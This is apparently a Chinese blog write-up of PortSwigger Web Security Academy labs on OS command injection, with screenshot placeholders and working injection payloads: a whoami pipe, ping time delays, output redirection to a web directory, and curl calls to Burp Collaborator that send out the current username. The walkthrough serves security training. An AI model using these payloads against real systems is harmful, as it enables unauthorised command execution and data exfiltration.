BurpSuite靶场系列之OS命令注入

环境

本次推荐的模拟环境如下:https://portswigger.net/web-security
邮箱注册登录
https://portswigger.net/web-security/all-labs
找到OS command injection
在这里插入图片描述

OS command injection, simple case

在这里插入图片描述
点一个产品进行浏览进行抓包
在这里插入图片描述

在这里插入图片描述

storeId=1|whoami

在这里插入图片描述

Blind OS command injection with time delays

在这里插入图片描述

在这里插入图片描述
email=真实邮箱||ping±c+10+127.0.0.1||
email=dzs12237%40yuoia.com||ping±c+10+127.0.0.1||
在这里插入图片描述

Blind OS command injection with output redirection

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
https://0a64000404d1dde5c11999cc008e00f7.web-security-academy.net/image?filename=output.txt

email=dzs12237%40yuoia.com||whoami>/var/www/images/outpu.txt||

在这里插入图片描述

Blind OS command injection with out-of-band interaction

在feedback功能点存在命令注入(盲注)
输入的命令会异步执行,从返回中不会得到任何信息,并且无法将结果重定向到可以访问到的目录,但可以使用外带(out-of-band)
要求执行一个DNS lookup,(利用 collaborator)

在这里插入图片描述

反馈你提交,抓包邮箱处构造
直接构造payload

||curl%20xxx.burpcollaborator.net||即可

burp Collaborator 使用:
有的自带无需安装
较低版本的burp 的 extender 下的 bapp store 找到 Collaborator 安装即可。安装后,首先需要设置下我们使用的服务器是官方默认提供的,在 project options-misc-burp collaborator server 下,选择第一个默认官方服务即可,第二个是关闭 collaborator,第三个是使用自己的服务器。如下图。
在这里插入图片描述
点击 Run health check 可以测试外带服务器服务是否正常

在这里插入图片描述
csrf=gtMV2Hk0lrSVfIw2gPwBfCqKIqsdzcsW&name=11&email=bxn55019%40yuoia.com||curl b9l.burpcollaborator.net||&subject=11&message=11
在这里插入图片描述

Blind OS command injection with out-of-band data exfiltration

在feedback功能点存在命令注入(盲注)
输入的命令会异步执行,从返回中不会得到任何信息,并且无法将结果重定向到可以访问到的目录,但可以使用外带(out-of-band)得到结果
要求通过外带获得当前用户名

在这里插入图片描述

email=333432%40qq.com||a=whoami;curl%20xlmor0wswc5r80n4ol6zncqio9u3is.burpcollaborator.net/`$a`||

在这里插入图片描述

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值